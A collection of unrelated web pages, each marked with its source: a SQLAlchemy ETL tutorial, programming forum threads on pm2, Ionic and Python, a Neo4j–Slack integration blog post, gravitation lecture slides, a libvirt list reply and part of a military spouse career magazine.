One of the key aspects of any data science workflow is the sourcing, cleaning, and storing of raw data in a form that can be used upstream. This process is commonly referred to as “Extract-Transform-Load,” or ETL for short.
It is important to design efficient, robust, and reliable ETL processes, or “data pipelines.” An inefficient pipeline will make working with data slow and unproductive. A non-robust pipeline will break easily, leaving gaps.
Worse still, an unreliable data pipeline will silently contaminate your database with false data that may not become apparent until damage has been done.
Although critically important, ETL development can be a slow and cumbersome process at times. Luckily, there are open source solutions that make life much easier.
What is SQLAlchemy?
One such solution is a Python module called SQLAlchemy. It allows data engineers and developers to define schemas, write queries, and manipulate SQL databases entirely through Python.
SQLAlchemy’s Object Relational Mapper (ORM) and Expression Language functionalities iron out some of the idiosyncrasies apparent between different implementations of SQL by allowing you to associate Python classes and constructs with data tables and expressions.
Here, we’ll run through some highlights of SQLAlchemy to discover what it can do and how it can make ETL development a smoother process.
Setting up
You can install SQLAlchemy using the pip package installer.
$ sudo pip install sqlalchemy
As for SQL itself, there are many different versions available, including MySQL, Postgres, Oracle, and Microsoft SQL Server. For this article, we’ll be using SQLite.
SQLite is an open-source implementation of SQL that usually comes pre-installed with Linux and Mac OS X. It is also available for Windows. If you don’t have it on your system already, you can follow these instructions to get up and running.
In a new directory, use the terminal to create a new database:
$ mkdir sqlalchemy-demo && cd sqlalchemy-demo
$ touch demo.db
Defining a schema
A database schema defines the structure of a database system, in terms of tables, columns, fields, and the relationships between them. Schemas can be defined in raw SQL, or through the use of SQLAlchemy’s ORM feature.
Below is an example showing how to define a schema of two tables for an imaginary blogging platform. One is a table of users, and the other is a table of posts uploaded.
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import *

engine = create_engine('sqlite:///demo.db')
Base = declarative_base()

class Users(Base):
    __tablename__ = "users"
    UserId = Column(Integer, primary_key=True)
    Title = Column(String)
    FirstName = Column(String)
    LastName = Column(String)
    Email = Column(String)
    Username = Column(String)
    DOB = Column(DateTime)

class Uploads(Base):
    __tablename__ = "uploads"
    UploadId = Column(Integer, primary_key=True)
    UserId = Column(Integer)
    Title = Column(String)
    Body = Column(String)
    Timestamp = Column(DateTime)

Users.__table__.create(bind=engine, checkfirst=True)
Uploads.__table__.create(bind=engine, checkfirst=True)
First, import everything you need from SQLAlchemy. Then, use create_engine(connection_string) to connect to your database. The exact connection string will depend on the version of SQL you are working with. This example uses a relative path to the SQLite database created earlier.
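For reference, connection strings for a few common backends follow the same general shape. The sketch below is plain Python; only the SQLite entry is used in this article, and the Postgres and MySQL entries use placeholder credentials, shown purely for comparison:

```python
# Illustrative SQLAlchemy connection-string formats.
# Only the SQLite entry belongs to this project; the others are placeholders.
connection_strings = {
    "sqlite": "sqlite:///demo.db",  # relative path to a file database
    "postgresql": "postgresql://user:password@localhost:5432/demo",
    "mysql": "mysql+pymysql://user:password@localhost:3306/demo",
}

# Every URL starts with the dialect name, optionally "+driver".
dialects = [url.split(":", 1)[0] for url in connection_strings.values()]
print(dialects)
```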
Next, start defining your table classes. The first one in the example is Users. Each column in this table is defined as a class variable using SQLAlchemy's Column(type), where type is a data type (such as Integer, String, DateTime and so on). Use primary_key=True to denote columns which will be used as primary keys.
The next table defined here is Uploads. It's very much the same idea; each column is defined as before.
The final two lines actually create the tables. The checkfirst=True parameter ensures that new tables are only created if they do not currently exist in the database.
Extract
Once the schema has been defined, the next task is to extract the raw data from its source. The exact details can vary wildly from case to case, depending on how the raw data is provided. Maybe your app calls an in-house or third-party API, or perhaps you need to read data logged in a CSV file.
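For instance, the CSV case can be sketched with Python's built-in csv module. The file contents and column names below are invented for illustration:

```python
import csv
import io

# Hypothetical raw CSV data; in a real pipeline this would be read from a file.
raw = """UserId,Email
1,alice@example.com
2,bob@example.com
"""

# DictReader yields one dict per row, keyed by the header line.
rows = list(csv.DictReader(io.StringIO(raw)))
```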
The example below uses two APIs to simulate data for the fictional blogging platform described above. The Users table will be populated with profiles randomly generated at randomuser.me, and the Uploads table will contain lorem ipsum-inspired data courtesy of JSONPlaceholder.
Python's Requests module can be used to call these APIs, as shown below:

import requests

url = ''
users_json = requests.get(url).json()
url2 = ''
uploads_json = requests.get(url2).json()
The data is currently held in two objects (users_json and uploads_json) in JSON format. The next step will be to transform and load this data into the tables defined earlier.
Transform
Before the data can be loaded into the database, it is important to ensure that it is in the correct format. The JSON objects created in the code above are nested, and contain more data than is required for the tables defined.
An important intermediary step is to transform the data from its current nested JSON format to a flat format that can be safely written to the database without error.
For the example running through this article, the data are relatively simple, and won't need much transformation. The code below creates two lists, users and uploads, which will be used in the final step:

from datetime import datetime, timedelta
from random import randint

users, uploads = [], []

for i, result in enumerate(users_json['results']):
    row = {}
    row['UserId'] = i
    row['Title'] = result['name']['title']
    row['FirstName'] = result['name']['first']
    row['LastName'] = result['name']['last']
    row['Email'] = result['email']
    row['Username'] = result['login']['username']
    dob = datetime.strptime(result['dob'], '%Y-%m-%d %H:%M:%S')
    row['DOB'] = dob.date()
    users.append(row)

for result in uploads_json:
    row = {}
    row['UploadId'] = result['id']
    row['UserId'] = result['userId']
    row['Title'] = result['title']
    row['Body'] = result['body']
    delta = timedelta(seconds=randint(1, 86400))
    row['Timestamp'] = datetime.now() - delta
    uploads.append(row)
The main step here is to iterate through the JSON objects created before. For each result, create a new Python dictionary object with keys corresponding to each column defined for the relevant table in the schema. This ensures that the data is no longer nested, and keeps only the data needed for the tables.
The other step is to use Python's datetime module to manipulate dates, and transform them into DateTime type objects that can be written to the database. For the sake of this example, random DateTime objects are generated using timedelta() from Python's datetime module.
Each created dictionary is appended to a list, which will be used in the final step of the pipeline.
Load
Finally, the data is in a form that can be loaded into the database. SQLAlchemy makes this step straightforward through its Session API.
The Session API acts a bit like a middleman, or “holding zone,” for Python objects you have either loaded from or associated with the database. These objects can be manipulated within the session before being committed to the database.
The code below creates a new session object, adds rows to it, then merges and commits them to the database:
Session = sessionmaker(bind=engine)
session = Session()

for user in users:
    row = Users(**user)
    session.add(row)

for upload in uploads:
    row = Uploads(**upload)
    session.add(row)

session.commit()
The sessionmaker factory is used to generate newly-configured Session classes. Session is an everyday Python class that is instantiated on the second line as session.
Next up are two loops which iterate through the users and uploads lists created earlier. The elements of these lists are dictionary objects whose keys correspond to the columns given in the Users and Uploads classes defined previously.
Each object is used to instantiate a new instance of the relevant class (using Python's handy some_function(**some_dict) trick). This object is added to the current session with session.add().
Finally, when the session contains the rows to be added, session.commit() is used to commit the transaction to the database.
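If anything goes wrong before the commit, you will usually want to roll the session back rather than leave it half-applied. Below is a minimal, self-contained sketch of that pattern, using an in-memory SQLite database and a throwaway table rather than the article's schema:

```python
from sqlalchemy import create_engine, Column, Integer, String
from sqlalchemy.orm import declarative_base, sessionmaker

Base = declarative_base()

class Person(Base):
    __tablename__ = "people"
    PersonId = Column(Integer, primary_key=True)
    Name = Column(String)

engine = create_engine("sqlite://")  # in-memory database, for illustration only
Base.metadata.create_all(engine)
session = sessionmaker(bind=engine)()

try:
    session.add(Person(PersonId=1, Name="Alice"))
    session.commit()
except Exception:
    # Undo everything staged in this session rather than half-committing.
    session.rollback()
    raise
```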
Aggregating
Another cool feature of SQLAlchemy is the ability to use its Expression Language system to write and execute backend-agnostic SQL queries.
What are the advantages of writing backend-agnostic queries? For a start, they make any future migration projects a whole lot easier. Different versions of SQL have somewhat incompatible syntaxes, but SQLAlchemy’s Expression Language acts as a lingua franca between them.
Also, being able to query and interact with your database in a seamlessly Pythonic way is a real advantage to developers who'd prefer to work entirely in the language they know best. However, SQLAlchemy will also let you work in plain SQL, for cases when it is simpler to use a pre-written query.
Here, we will extend the fictional blogging platform example to illustrate how this works. Once the basic Users and Uploads tables have been created and populated, a next step might be to create an aggregated table — for instance, showing how many articles each user has posted, and the time they were last active.
First, define a class for the aggregated table:
class UploadCounts(Base):
    __tablename__ = "upload_counts"
    UserId = Column(Integer, primary_key=True)
    LastActive = Column(DateTime)
    PostCount = Column(Integer)

UploadCounts.__table__.create(bind=engine, checkfirst=True)
This table will have three columns. For each UserId, it will store the timestamp of when they were last active, and a count of how many posts they have uploaded.
In plain SQL, this table would be populated using a query along the lines of:
INSERT INTO upload_counts
SELECT UserId,
       MAX(Timestamp) AS LastActive,
       COUNT(UploadId) AS PostCount
FROM uploads
GROUP BY 1;
In SQLAlchemy, this would be written as:
connection = engine.connect()

query = select([Uploads.UserId,
                func.max(Uploads.Timestamp).label('LastActive'),
                func.count(Uploads.UploadId).label('PostCount')]).\
        group_by('UserId')

results = connection.execute(query)

for result in results:
    row = UploadCounts(**result)
    session.add(row)

session.commit()
The first line creates a Connection object using the engine object's connect() method. Next, a query is defined using the select() function.
This query is the same as the plain SQL version given above. It selects the UserId column from the uploads table. It also applies func.max() to the Timestamp column, which identifies the most recent timestamp. This is labelled LastActive using the label() method.
Likewise, the query applies func.count() to the UploadId column to count the number of upload records per user. This is labelled PostCount.
Finally, the query uses group_by() to group results by UserId.
To use the results of the query, a for loop iterates over the row objects returned by connection.execute(query). Each row is used to instantiate an instance of the UploadCounts table class. As before, each row is added to the session object, and finally the session is committed to the database.
Checking out
Once you have run this script, you may want to convince yourself that the data have been written correctly into the demo.db database created earlier.
After quitting Python, open the database in SQLite:
$ sqlite3 demo.db
Now, you should be able to run the following queries:
SELECT * FROM users;
SELECT * FROM uploads;
SELECT * FROM upload_counts;
And the contents of each table will be printed to the console! By scheduling the Python script to run at regular intervals, you can be sure the database will be kept up-to-date.
You could now use these tables to write queries for further analysis, or to build dashboards for visualisation purposes.
Reading further
If you’ve made it this far, then hopefully you’ll have learned a thing or two about how SQLAlchemy can make ETL development in Python much more straightforward!
It is not possible for a single article to do full justice to all the features of SQLAlchemy. However, one of the project’s key advantages is the depth and detail of its documentation. You can dive into it here.
Otherwise, check out this cheatsheet if you want to get started quickly.
The full code for this article can be found in this gist.
Thanks for reading! If you have any questions or comments, please leave a response below.
Source: https://www.freecodecamp.org/news/sqlalchemy-makes-etl-magically-easy-ab2bd0df928/
Deploy react app to AWS with pm2

I am trying to deploy a React app to AWS following this tutorial. My app is slightly different, and when I run pm2 start ecosystem.config.js --env production I get that the app status is online, but pm2 show reports the status as errored with the following output:

/home/ubuntu/www/react/tools/distServer.js:4
import browserSync from 'browser-sync';
^^^^^^
SyntaxError: Unexpected token import
my ecosystem.config.js file looks like this:
module.exports = {
apps : [
{
name: "blockchainwallet",
script: "tools/distServer.js",
watch: true,
env: {
"PORT": 8080,
"NODE_ENV": "development"
},
env_production: {
"PORT": 3000,
"NODE_ENV": "production",
}
}
]
}
Could you give me any suggestions to fix this bug?
Source: https://www.edureka.co/community/15393/deploy-react-app-to-aws-with-pm2
Update: You can now join our public neo4j-users Slack group, where this extension is installed.

Our colleague Andreas, who loves Slack and brought it into our company, suggested the other day that we could build a Slack and Neo4j integration to demonstrate how useful a graph database backend would be. And, of course, how much fun.
Building Blocks

As it was only midnight, we, the amazing Nicole and Michael, decided to put something together. We set up a Neo4j 2.2.3 instance in the cloud. Then, we created a Python app for our Slack-Neo4j server and pushed it to GitHub. The application uses web.py for the webapp, requests to access the Slack APIs, and py2neo to talk to Neo4j. Next we pushed it to Heroku to make it available publicly so that Slack could connect to it. You have to provide environment variables for your Neo4j server, your Slack API token and the team token configured with your slash command. Find the details in the project readme.
Slack Slash Command

With all that complete, we could then set up a slash command. For our integration, the ideas came from Andreas:

/graph import – import users, channels and membership into Neo4j
/graph cypher MATCH ... RETURN – execute a read-only Cypher statement and return the results
/graph – provide an overview of the data that's in the database

After parsing the POST payload and checking the team token, we then got the first word of the text parameter as the "command" to dispatch on.
Getting Data from Slack into Neo4j

For the integration with Neo4j we sent Cypher statements to Neo4j using py2neo's APIs. Example below:

import os
from py2neo import Graph

graph = Graph(os.environ.get('NEO4J_URL'))
graph.cypher.execute("MATCH (u:User)-[:MEMBEROF]->(c:Channel) RETURN u.screenname, c.name")

Sending requests to the Slack API with the token and getting the JSON response is straightforward with requests. We then passed the JSON response directly as parameters to a Cypher statement to create the graph structure in Neo4j:

import requests

res = requests.get("{}".format(token))
query = """
UNWIND {channels} AS channel
MERGE (c:Channel {id:channel.id})
ON CREATE SET c.name = channel.name
"""
graph.cypher.execute_one(query, res.json())

As you can see, we can import users, channels and memberships, easy peasy.
/graph import users
slackbot: 115 users uploaded. Only you can see this message.

/graph import channels
slackbot: 117 channels uploaded. Only you can see this message.
Graph All the Slack Things

And to show you that it worked, here is a graph of our Slack universe:

/graph cypher match (u:User)-->() return u, count(*) as memberships order by memberships desc limit 3

slackbot:
   | u                                                              | memberships
---+----------------------------------------------------------------+-------------
 1 | (n200:User {fullname:"Michael",id:"U02HVJ36",username:"mh"})   | 64
 2 | (n151:User {fullname:"Chris",id:"U0KLMP5X",username:"cl"})     | 37
 3 | (n210:User {fullname:"Philip",id:"U02HDEF0EX",username:"pr"})  | 37
Recommendations

Finally, the biggest surprise of all: we wanted to recommend new channels to people. We used traditional collaborative filtering for this concept of "channels of your colleagues that are not yet your channels". But we also filter out prolific users and channels so that they don't distort the picture.

/graph cypher
MATCH (c:Channel) WITH toInt(count(*)*0.618) AS channel_cutoff
MATCH (u:User) WITH toInt(count(*)*0.618) AS user_cutoff, channel_cutoff
MATCH (u:User {username:"laeg"})-[:MEMBER_OF]->(c:Channel)
      <-[:MEMBER_OF]-(coll:User)-[:MEMBER_OF]->(reco:Channel)
WHERE size((c)<--()) < channel_cutoff
  AND size((reco)<--()) < channel_cutoff
  AND size((coll)-->()) < user_cutoff
  AND NOT (u)-[:MEMBER_OF]->(reco)
RETURN reco.name, count(*) AS freq
ORDER BY freq DESC LIMIT 5;

slackbot:
   | reco.name           | freq
---+---------------------+------
 1 | feedback            | 218
 2 | dev-team            | 179
 3 | sales_marketing     | 161
 4 | marketing           | 142
 5 | cypher-the-language | 125
Just awesome, guys. I'm a heavy user of Neo4j and Slack. This combination is a match made in heaven. I'm gonna take a look at the repo.
Source: https://neo4j.com/blog/the-neo4j-slack-integration-youve-been-waiting-for-is-here/
If you follow this idiom, there’s no need to interact with NavControllers at all.
- Okay, but shouldn't setting the root with NavController (setRoot) work anyway?
- I will analyze the link you provided me, to study how to do so.
I know I am late to the party, and this is a few months old already. But I think the code you are looking for is to access the root nav from the App utility class, using getRootNav() and pop() from there.
Ionic Tabs have a strange navigation stack (it's not so strange when you think why). The <ion-tabs> instance is pushed to the root nav, and each <ion-tab> has its own NavController. This is so you can push as deep as you need to per tab, and simply switch to another tab without screwing up the other tab's navigation stack.
Essentially what you want to do is this on one of your pages:
logout() {
  this.app.getRootNav().pop();
}
The <ion-tabs> is pushed to the root navigation stack, and each tab's individual navigation stack is a child to this, so is not part of the root. Make sense?
Not to me. I want each element of my app to be independent, with clearly defined boundaries for interaction. Having arbitrary pages mess with the app component’s nav stack breaks that contract, so I consider it flawed design.
Unfortunately, I cannot answer for the design decisions.
As for the alternative solution. I agree - I suppose it depends on how you want to handle your navigation stack. I tend to avoid interacting with the root page unless I am initialising the app, since you don’t get the advantages built into the NavController.
Import this where your logout function is:

import { App } from 'ionic-angular';

Add it to the constructor:

constructor(public appCtrl: App) {}

Then in the controller:

logout() {
  this.appCtrl.getRootNav().setRoot(LoginPage);
}

Use this and it will work.
That works for me. Ionic 3
Also works at Ionic 3. thank you
Whats up man!
It works for me!
I’m using Ionic 3
Thanks !
Awesome
works, ionic 2
Thank you very much, everything worked out.
In your AppComponent.ts:
import { Component } from '@angular/core';
import { Config, Nav, Platform } from 'ionic-angular';
import { AuthService, ServiceWorkerService, LoggerService } from '@core/index';

@Component({
  templateUrl: 'app.component.html'
})
export class AppComponent {
  // [root]="rootPage"
  public rootPage: any = 'LoadingPage';
  // [class]="theme"
  public theme: String = 'orange-theme';

  constructor(public config: Config,
              public platform: Platform,
              private authService: AuthService,
              private swService: ServiceWorkerService,
              private logger: LoggerService) {
    this.initialiseApp();
  }

  private initialiseApp() {
    this.platform.ready().then(() => {
      this.swService.run();
    });

    this.authService.afAuth.authState.subscribe(user => {
      if (user) {
        this.rootPage = 'TabsPage';
      } else {
        this.rootPage = 'SignInPage';
      }
    }, () => {
      this.rootPage = 'SignInPage';
    });
  }
}
app.component.html:
<ion-nav [root]="rootPage" [class]="theme"></ion-nav>
Hi @IonBruno,

My suggestion is to use:

import { App } from 'ionic-angular';

this.appCtrl.getRootNav().setRoot(LoginPage);

instead of this.navCtrl.setRoot(LoginPage);
Thank you it work for me
thx dude, this works for ionic 3 latest
Using this.appCtrl.getRootNav().setRoot(LoginPage); works fine in Ionic 3, but it is hiding my side menu.
Please select this as the answer as it works perfectly
thanks a lot, that helps
Hi, how did you fix this?
Hi, thanks! It's working with Ionic 5.
Source: https://forum.ionicframework.com/t/pop-tabspage-and-push-loginpage/78716/13?u=shaileshbappanadu
Published by Emily Harmon, modified over 5 years ago
ISAAC NEWTON (1642 - 1727)
The rate of acceleration due to gravity at the Earth's surface was proportional to the Earth's gravitational force on the Moon. The Earth's gravitational force on the Moon was inversely proportional to the square of the Earth's distance from the Moon: F_g ∝ 1/r²
LAW OF UNIVERSAL GRAVITATION
F_g = G m₁ m₂ / r²
m₁ and m₂ = masses of the two objects (kg)
r = center-to-center distance between the objects
G = universal gravitational constant = 6.67 × 10⁻¹¹ N·m²/kg²
HENRY CAVENDISH (1731 - 1810)
1798: Using a torsion balance, Cavendish measured the gravitational attraction between small objects, and calculated the value of the universal gravitational constant.
Gravity Near Earth's Surface
The force of gravity is the weight of the object. Near Earth's surface:
F_g = G m m_E / r_E² = mg
g = G m_E / r_E²
The mass of the Earth can be calculated from this: m_E = g r_E² / G
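As a quick sanity check, plugging rounded textbook values into m_E = g r_E² / G recovers the familiar mass of the Earth:

```python
G = 6.67e-11    # universal gravitational constant, N·m²/kg²
g = 9.81        # acceleration due to gravity at the surface, m/s²
r_E = 6.371e6   # mean radius of the Earth, m

# Rearranging g = G·m_E / r_E² gives the mass of the Earth.
m_E = g * r_E**2 / G
print(m_E)  # ≈ 5.97e24 kg
```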
Gravity Near Earth's Surface
The value of g on Earth can vary due to:
- elevation and latitude (distance from the center of the Earth)
- variations in the densities of rock; this may indicate the presence of mineral or oil deposits.
These variations are small, but can be measured with a gravimeter.
Satellites
Satellites are placed in orbit by "throwing" them with enough velocity that they fall around the Earth. If you give it enough speed, a satellite will escape, never to return (escape speed).
TYCHO BRAHE (1546 - 1601)
Danish astronomer. Became astronomer to the King of Denmark, and made highly detailed observations of planetary movements for over 20 years.
JOHANN KEPLER (1571 - 1630)
German mathematician. 1609: Kepler publishes a book which describes the motion of the planets.
Kepler's 1st Law: Planets move around the Sun in elliptical orbits, with the Sun at one focus.
JOHANN KEPLER (1571 - 1630)
Kepler's 2nd Law: A straight line connecting the Sun and a planet sweeps out equal areas in equal time intervals.
JOHANN KEPLER (1571 - 1630)
Kepler's 3rd Law: The ratio of the squares of the periods T of any two planets revolving around the Sun is equal to the ratio of the cubes of their mean distances s from the Sun:
(T₁/T₂)² = (s₁/s₂)³
Kepler's 3rd law applies to any two bodies orbiting a common center.
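The law is easy to check numerically, e.g. for Earth and Mars (periods in years, mean distances in AU, rounded values):

```python
# Orbital period T (years) and mean distance s (AU) for Earth and Mars.
T_earth, s_earth = 1.000, 1.000
T_mars, s_mars = 1.881, 1.524

lhs = (T_earth / T_mars) ** 2  # ratio of squared periods
rhs = (s_earth / s_mars) ** 3  # ratio of cubed distances
print(lhs, rhs)  # both ≈ 0.283
```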
Kepler's Laws and Newton's Synthesis
Newton was able to show that:
- Kepler's Laws could be derived from universal gravitation and the laws of motion
- only an inverse-square relationship for gravitation would explain Kepler's laws.
Deviations in the orbits predicted by Kepler's laws (perturbations) can be used to locate undiscovered planets.
Types of Forces in Nature
Four fundamental forces:
- gravitational
- electromagnetic
- strong nuclear
- weak nuclear
Physicists have unified the electromagnetic and the weak nuclear forces (the electroweak force), but still seek a Grand Unified Theory. Everyday forces are due to electromagnetic and gravitational forces.
Source: https://slideplayer.com/slide/6838761/
A python program that I'm debugging has the following code (including print statements for debugging):
print
print "BEFORE..."
print "oup[\"0\"] = " + str(oup["0"])
print "oup[\"2008\"] = " + str(oup["2008"])
print "oup[\"2009\"] = " + str(oup["2009"])
oup0 ...
errors = int(0)
for i in range(len(expectedData)):
if data[i] != expectedData[i]:
errors += int(binary_compare(data[i], expectedData[i]))
return errors
I'm trying to get a value from a variable inside some files, here is the code:
path = '/opt/log/...'
word = 'somevariable'
def enumeratepaths(path=path):
paths = []
for ...
Problem with an int variable, by ChiCotje, Tue Dec 09, 2008 2:35 am: Hello, I have a little problem with my code. The code is a simple text-input dialog (TextCtrl). With the wx.Choice option you can influence the variable that you fill in the TextCtrl. It happens in the "def OnButtonOK" function. So I want to influence the variable "timeInterval" ...
You're searching for something like S2 = 0, S3 = 0, ... to define a variable with the name 's' + number? You can use 'exec':

string = 's%i=current_server' % number
exec string

but I wouldn't recommend that. It's clearer (for me, at least) to use an auxiliary dictionary. You can set it up and actually ask for the defined keys. ...
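The auxiliary-dictionary approach suggested here might look like this (the server names are invented for illustration):

```python
current_servers = ["alpha", "beta", "gamma"]

# Instead of exec'ing "s2 = ..." strings, key a dict by the generated
# name; the defined "variables" can then be listed and queried.
servers = {}
for number, server in enumerate(current_servers):
    servers['s%i' % number] = server

print(sorted(servers))  # ['s0', 's1', 's2']
```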
num1 = 0
num2 = 1
count = 1
logfile = open('test.log', 'a')
logfile.write('Fibinacci')
while count < 100:
    num3 = num1 + num2
    print(num3)
    logfile.write(num3)
    num1 = num2 + num3
    print(num1)
    logfile.write(num1)
    num2 = num1 + num3
...
Hello, I want to replace numbers with 0 or 1 using a cutoff value. For example: 0.21 0.45 0.78, cutoff value: 0.30, result: 0 1 1. The problem is that I don't know what the numbers are. The user of my program is able to give the input (by raw_input), so I can't use the replace(old, new) function. Is there ...
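One way to do this without replace() is to parse the input and compare each value against the cutoff. A sketch, using the example values above (with decimal points rather than commas):

```python
raw = "0.21 0.45 0.78"  # user input, e.g. from raw_input()
cutoff = 0.30

# Parse the numbers, then map each one to 0 or 1 against the cutoff.
flags = [1 if float(v) >= cutoff else 0 for v in raw.split()]
print(flags)  # [0, 1, 1]
```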
Source: http://www.java2s.com/Questions_And_Answers/Python-Data-Type/integer/variable.htm
On Wed, Mar 19, 2008 at 11:16:32PM -0700, Dave Leskovec wrote: > This patch adds the start container support. A couple new source files are > added - lxc_container.h and lxc_container.c. These contain the setup code that > runs within the container namespace prior to exec'ing the user specified init. IMHO there's too much forking going on here. With the stateful driver we should have the daemon be the parent of the forked VM, as per the QEMU driver. This will avoid the need to unsafely re-write the config files. It will also enable errors during the domain creation process to be correctly propagated back to the caller. eg, when I tested this patch 'mount' failed, but the libvirt driver still thought all was fine because this part of domain creation was being done in the double-fork()d child and thus no errors could be propagated :|
Source: https://www.redhat.com/archives/libvir-list/2008-March/msg00224.html
NMSN MAGAZINE
November 5, 2015, Vol. 2, Issue 2
Register NOW for the
5th Annual Military Spouse Summit November 13-14
Springfield, VA
Register online at
MILSPOUSESUMMIT.COM
• COMMON BUSINESS ENTITIES • THE MORE YOU KNOW • A CONVERSATION WITH PAM ALLEN • UTILIZING BLOGGERS
TABLE OF CONTENTS
3 PRESIDENT'S LETTER
4 MEET THE EXPERTS
8 COMMON BUSINESS ENTITIES
12 GETTING IT "WRITE" ON YOUR RESUME
14 THE HOUSE IS MESSIER AND I DON'T CARE
20 FIRST IMPRESSIONS DO MATTER
23 PUT YOUR BEST FOOT FORWARD
25 THE MORE YOU KNOW
29 TRANSITION
32 USE YOUR B.R.A.I.N.
34 WORKING WITH HEAD HUNTERS
38 UTILIZING BLOGGERS
40 THEN AND NOW: A CONVERSATION WITH PAM ALLEN
Sue Hoppin
Rachel Brenke
Janet Farley, Ed.M.
Carol Fishman Cohen Joyce Neave
Amy Schofield, ACRW Matt Zemon Sue Hoppin
Carol Bowser, JD Julie Waters Greta Perry
Shelley Kimball
Visit us online at About Us | Join Today | Editorial | Advertise
No part of this publication can be reproduced, stored or transmitted in any form without the written permission of the Publisher.
By now everyone's settled the kids in school and schedules are starting to normalize somewhat. The back-to-school rituals are well on their way. It's time to start thinking about YOU and your goals! As parents, we're quick to prioritize everyone else ahead of ourselves. Don't do this. Your goals and ambitions are just as important as everyone else's needs.
Sue Hoppin
Spend some time thinking about your personal and professional goals. Write them down and start chipping away at them. Otherwise, you're going to turn around one day and realize that 5, 10, 20 years have passed and you're in the position of cobbling together that resumé and trying to figure out how to break into the workforce. If you take little steps along the way, you're going to put yourself in a much better position to re-launch your career when you're ready to work outside the home full time. Our experts are prolific writers on this subject, but if I had to boil down their advice and insights into 5 tips, this is where I would start:
• Keep your resumé and LinkedIn profile updated at all times. You never know when opportunity will present itself and you want to be ready.
• Take advantage of opportunities to fill in your resumé gaps, whether it's through strategic volunteering or part-time jobs that develop skills and knowledge that you may need to round out your resumé.
• Join organizations to affiliate with like-minded people and keep up with trends in your field.
• Set goals and write them down. At least once a year, take a look at those goals and adjust them as needed to reflect your long-term goals and ambitions.
• Never stop learning. Attend networking events and take advantage of professional development opportunities to grow and stay current in your field.
To the last point, if you're in the DC area or close by, I hope you'll join us at our 5th Annual Military Spouse Career Summit. Whether you're a volunteer, job seeker, entrepreneur or just a milspouse looking to network with other career-minded military spouses, this is the event for you. We always have a great mix of military spouses married to currently serving, veteran AND retired servicemembers, as well as a positive environment, so it's a fun way to hone your skills, gain some new insights and expand your professional network.
This year, we’re thrilled to be joined by Katherine Berman and Sophie LaMontagne, the co-founders of Georgetown Cupcake. They’ll be sharing their business experiences and lessons learned, then sticking around for a cupcake reception/meet and greet. It’s sure to be a great time. For more information or to register, check out milspousesummit.com. Hope to see you there! Connect with us on Facebook /NMSNetwork and on Twitter @NMSNetwork. Visit us online at
MEET THE EXPERTS
SUE HOPPIN Sue Hoppin is the founder and president of the National Military Spouse Network, a consultant on military family issues and the coauthor.
CAROL BOWSER.
RACHEL BRENKE: Disclaimer: I am a lawyer but I’m not your lawyer! View my entire disclaimer HERE.
CAROL FISHMAN COHEN Carol Fishman Cohen is a globally recognized expert on career-reentry strategy. She is co-author of Back on the Career Track: A Guide for Stay-at-Home Moms Who Want to Return to Work and co-founder of iRelaunch.
JANET FARLEY Janet Farley serves as a NMSN subject matter expert and she is the author of The Military Spouse’s Employment Guide: Smart Job Choices for Mobile Lifestyles (Impact Publications, 2012). For more military spouse employment tips and thoughts, follow her @ Smartjobchoices on Twitter.
JOYCE NEAVE.
GRETA PERRY.
AMY SCHOFIELD Amy Schofield is the founder of Schofield Strategies [http://schofieldstrategies.com/].
JULIE WATERS.
MATT ZEMON.
COMMON Business Entities by Rachel Brenke
When running a business, it is important (and cost effective) to spend time establishing a solid infrastructure for your business. This means understanding applicable laws, identifying risks, and setting policies and procedures. A qualified business attorney can advise you on best practices for your business. There are several types of business entities, which are commonly used for business formation.
SOLE PROPRIETORSHIP A Sole Proprietorship is a one-owner business, created at the county or city level, that does not have a legal existence separate from the owner as an individual. Sole Proprietorships are the default structure when formation documents are not filed but business owners are engaged in business. This type of structure is typically reported on a personal income tax return on a Schedule C. This structure has no liability protection shield between personal and business assets but is the easiest and cheapest way to form a business.
The choice of entity depends on your objectives and the tax and legal aspects of the entity. Set aside some time (and funds) to review your goals with your legal and tax teams before launching, and you will set your business up for success!
PARTNERSHIP Partnerships can be created by default through action as an operation of law, but they should always be accompanied by partnership agreements to outline all responsibilities, monies, debts and other important details.
Don’t avoid taking the legal bull by the horns simply because you are unaware of the process.
CORPORATION The corporation is considered to be a separate legal person under the law. It is run by a board of directors who appoint officers to run the day-to-day business affairs. It is owned by its shareholders and may be subject to double taxation (taxed first at the corporate level and then at the shareholder level if dividends are paid). Because it has been in existence for over 50 years, the rules and regulations enacted by Congress and the IRS are complex. Corporation structures are more time- and administrative-intensive than other types of business but can bring great tax benefits depending on specific business situations.
LIMITED LIABILITY COMPANY The best, and most popular, form of business entity is usually the limited liability company. It is taxed like a partnership (no double taxation; see above), is very flexible, and has legal advantages that are not available to corporations (e.g. no “piercing of the corporate veil”). If the business will have multiple owners, it is best to have a lawyer set up the LLC properly and accompany the formation with an operating agreement to manage possibilities such as death, retirement, divorce and conflict. LLCs also have the benefit of being filed on a personal income tax return (1040 Schedule C) like a Sole Proprietorship but have the option to elect Corporation taxation through the IRS for additional tax benefits without the corporation administrative duty requirements.
HOW TO CHOOSE? Choosing a structure for your business may be a difficult decision but is not one to avoid simply because it is overwhelming. The first step is to examine the structures provided above and ask yourself the following questions: What is my financial budget for formation? How important is liability protection to my business and the nature of the business? What is my long-term goal with the business? These questions will help to shape your business formation plan. A small business attorney can help you work through your plan and liability protection desires, while a Certified Public Accountant (CPA) can weigh in on the tax benefits for your specific tax situation.
Business formation may be overwhelming, but it is legally required and an important part of running a business. Don’t avoid taking the legal bull by the horns simply because you are unaware of the process. Professionals are available to assist you in your business decisions, but always be sure to communicate your intentions and long-term goals fully to reach the best decision with these professionals.
Visit us online:. com/meet-rachel-the-law-tog/ Disclaimer: I am a lawyer but I’m not your lawyer! View my entire disclaimer HERE.
GETTING IT “WRITE” ON Your Resume
by Janet Farley, Ed. M.
There are things in life we like to do, such as spending quality time with our families, travelling to new and exciting places, and spending hours shopping when everything is on sale and everything fits us.
Then there are those things in life we don’t exactly like to do, like PCS every few years or hear a doctor say, “this won’t hurt a bit”. Somewhere on that list of things we don’t exactly like to do has to be spending countless hours updating our resumes for new jobs.
In the name of enhancing your time management skills and in landing the job you really want, let’s discuss how to get it write on your resume. Pun intended.
IT LIVES Before you launch into edit mode, accept one reality about your resume. It lives. It is not a static document that you review every few years when it suits you.
Your resume is a living, breathing document that you take good care of so it can take good care of you when time is short and opportunities are present. This means you need to give it more than a passing thought on a fairly regular basis.
Best suggestion? Pick a schedule, any schedule, and stick to it.
